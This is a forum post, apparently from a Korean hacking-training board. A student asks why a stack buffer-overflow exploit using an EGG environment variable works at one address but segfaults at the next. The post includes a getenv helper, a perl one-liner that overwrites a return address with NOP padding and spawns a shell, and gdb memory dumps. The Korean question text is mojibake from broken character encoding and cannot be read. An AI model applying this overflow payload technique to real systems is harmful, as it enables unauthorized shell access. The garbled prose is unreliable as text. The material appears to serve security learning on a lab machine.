|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1678 [º¹»ç]
Á¦°¡ ±Ã±ÝÇÑ°Ç getenv EGG·Î ¾Ë¾Æ³½ EGGȯ°æ º¯¼öÀÇ ÁÖ¼Ò¸¦ ±×´ë·Î ½èÀ» ¶© ¼¼±×ÆúÀÌ ¹ß»ýÇÏ°í
getenv EGG·Î ¾Ë¾Æ³½ EGGȯ°æ º¯¼öÀÇ ÁÖ¼Ò¿¡¼ -1À» ÇÑ ÁÖ¼Ò¸¦ ½èÀ» ¶© ¼¼±×ÆúÀÌ ¹ß»ýÇÏÁö¾Ê°í °ø°ÝÀÌ ¼º°øÇß½À´Ï´Ù.
¿Ö ÀÌ·± °ÇÁö ¼³¸íÇØÁֽøé Á¤¸» °¨»çÇÏ°Ú½À´Ï´Ù.
[student@BOF student]$ ./getenv EGG
0xbffffea8
[student@BOF student]$ ./vv `perl -e print'"\x90"x8,"\xa8\xfe\xff\xbf"'` Segmentation fault (core dumped)
[student@BOF student]$ ./vv `perl -e print'"\x90"x8,"\xa7\xfe\xff\xbf"'`
bash$
gdb·Î 0xbffffea8°ú 0xbffffea7ÁÖ¼Ò¿¡ ¸Õ°¡ ÀÖ´ÂÁö ºÃÁö¸¸ Àß ¸ð¸£°Ú½À´Ï´Ù..
(gdb) x/s 0xbffffea8
0xbffffea8: "1;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;3"...
(gdb) x/s 0xbffffea7
0xbffffea7: "01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;"...
-getenv.c-
int main(int argc,char *argv[])
{
printf("%x\n",getenv(argv[1]));
}
|
Hit : 4208 Date : 2013/05/26 06:50
|
1576, 
1/79 
º°ºûÀ»´ã¾Æ
